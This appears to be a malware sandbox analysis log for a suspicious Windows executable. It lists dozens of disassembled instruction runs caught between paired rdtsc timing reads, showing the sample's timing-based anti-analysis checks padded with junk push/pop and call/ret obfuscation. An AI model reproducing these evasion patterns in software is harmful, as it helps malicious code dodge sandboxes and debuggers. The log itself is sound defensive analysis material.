Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A424A5 second address: A424B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A424B5 second address: A424C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42A66 second address: A42A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFA692CA416h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A42A7B second address: A42A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945BBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4347C second address: A43480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A43480 second address: A4348E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFA68B945BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4456E second address: A44572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A44572 second address: A44587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4503B second address: A4503F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4503F second address: A45049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A45B08 second address: A45B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FFA692CA416h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A458A7 second address: A458B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A45B16 second address: A45B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FFA692CA418h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 or dword ptr [ebp+122D1943h], ebx 0x0000002c mov dword ptr [ebp+122D248Ch], edx 0x00000032 push 00000000h 0x00000034 js 00007FFA692CA41Ch 0x0000003a mov dword ptr [ebp+122D253Dh], edx 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 jmp 00007FFA692CA429h 0x00000048 js 00007FFA692CA416h 0x0000004e popad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A45B80 second address: A45B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A45B86 second address: A45B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA692CA41Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4CEF2 second address: A4CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4CEF6 second address: A4CEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4CEFA second address: A4CF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov di, CB6Ch 0x0000000b push 00000000h 0x0000000d mov bh, A0h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FFA68B945B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jnl 00007FFA68B945B8h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4CF3B second address: A4CF4E instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA692CA418h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A479AC second address: A479C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnl 00007FFA68B945B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | RDTSC instruction interceptor: First address: A4CF4E second address: A4CF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A479C1 second address: A479E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4C109 second address: A4C1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FFA692CA420h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFA692CA41Eh 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+1247A632h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push edi 0x00000024 jng 00007FFA692CA41Ch 0x0000002a je 00007FFA692CA416h 0x00000030 pop edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 call 00007FFA692CA424h 0x0000003d jmp 00007FFA692CA41Fh 0x00000042 pop edi 0x00000043 push edi 0x00000044 or dword ptr [ebp+122D3594h], edx 0x0000004a pop ebx 0x0000004b mov eax, dword ptr [ebp+122D16E5h] 0x00000051 mov edi, dword ptr [ebp+122D1B46h] 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007FFA692CA418h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 0000001Bh 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 mov dword ptr [ebp+12473594h], ecx 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jng 00007FFA692CA41Ch 0x00000082 jnp 00007FFA692CA416h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFEC second address: A4DFF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFF0 second address: A4DFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFF9 second address: A4DFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFFF second address: A4E01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FFA692CA41Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4E01B second address: A4E021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4F18F second address: A4F1AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA427h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4F1AA second address: A4F231 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FFA68B945B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edi, 782820E0h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FFA68B945B8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 jmp 00007FFA68B945C7h 0x0000004d push 00000000h 0x0000004f mov edi, ebx 0x00000051 push esi 0x00000052 push eax 0x00000053 mov di, D3E1h 0x00000057 pop ebx 0x00000058 pop edi 0x00000059 push eax 0x0000005a push ecx 0x0000005b pushad 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50248 second address: A5025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA41Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5025C second address: A50281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FFA68B945C9h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50281 second address: A5028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFA692CA416h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50317 second address: A5031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5031B second address: A50338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA692CA424h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54AE5 second address: A54AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A53D67 second address: A53D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A53D6F second address: A53DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FFA68B945B8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a xor edi, dword ptr [ebp+1246AB73h] 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov ebx, dword ptr [ebp+122D20BEh] 0x0000003d mov eax, dword ptr [ebp+122D02C5h] 0x00000043 mov bx, cx 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FFA68B945B8h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 jmp 00007FFA68B945BFh 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56B68 second address: A56B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56B7E second address: A56BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFA68B945B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push ebx 0x0000002a mov dword ptr [ebp+1246AB98h], edi 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D18FAh], ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c sub dword ptr [ebp+122D2658h], ecx 0x00000042 pop ebx 0x00000043 xchg eax, esi 0x00000044 jno 00007FFA68B945C4h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFA68B945C9h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56BFD second address: A56C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56C13 second address: A56C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54C79 second address: A54C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54C7E second address: A54CA9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA68B945BCh 0x00000008 jg 00007FFA68B945B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C6h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54CA9 second address: A54D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, ax 0x0000000d pushad 0x0000000e movsx ecx, si 0x00000011 popad 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D36C1h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 adc bx, 4D25h 0x0000002b jmp 00007FFA692CA429h 0x00000030 mov eax, dword ptr [ebp+122D1709h] 0x00000036 push ecx 0x00000037 xor edi, dword ptr [ebp+122D3B25h] 0x0000003d pop edi 0x0000003e pushad 0x0000003f xor dword ptr [ebp+122D2913h], edx 0x00000045 adc eax, 754BABCDh 0x0000004b popad 0x0000004c push FFFFFFFFh 0x0000004e xor edi, dword ptr [ebp+122D1B3Bh] 0x00000054 push eax 0x00000055 pushad 0x00000056 push ebx 0x00000057 push esi 0x00000058 pop esi 0x00000059 pop ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59AC7 second address: A59B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFA68B945C9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FFA68B945BEh 0x00000013 mov ebx, dword ptr [ebp+122D3B69h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FFA68B945B8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D27CAh], edi 0x0000003b push 00000000h 0x0000003d mov ebx, 15BD1B32h 0x00000042 xchg eax, esi 0x00000043 jbe 00007FFA68B945C0h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B37 second address: A59B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFA692CA41Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B50 second address: A59B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59B56 second address: A59B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AAB2 second address: A5AAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5AAB7 second address: A5AAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A05C second address: A6A098 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FFA68B945C1h 0x0000000f ja 00007FFA68B945C6h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A098 second address: A6A09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A09E second address: A6A0B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007FFA68B945B6h 0x00000013 jp 00007FFA68B945B6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6A0B8 second address: A6A0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA425h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0A8 second address: A6F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0AD second address: A6F0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FFA692CA416h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0B9 second address: A6F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0BD second address: A6F0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0C3 second address: A6F0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6F0CF second address: A6F0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E3E7 second address: A6E404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E404 second address: A6E40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E40A second address: A6E43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFA68B945C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA68B945C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E43D second address: A6E441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E441 second address: A6E457 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA68B945B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007FFA68B945BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E457 second address: A6E463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFA692CA422h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E88F second address: A6E895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E895 second address: A6E899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E899 second address: A6E8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8B1 second address: A6E8B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8B8 second address: A6E8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
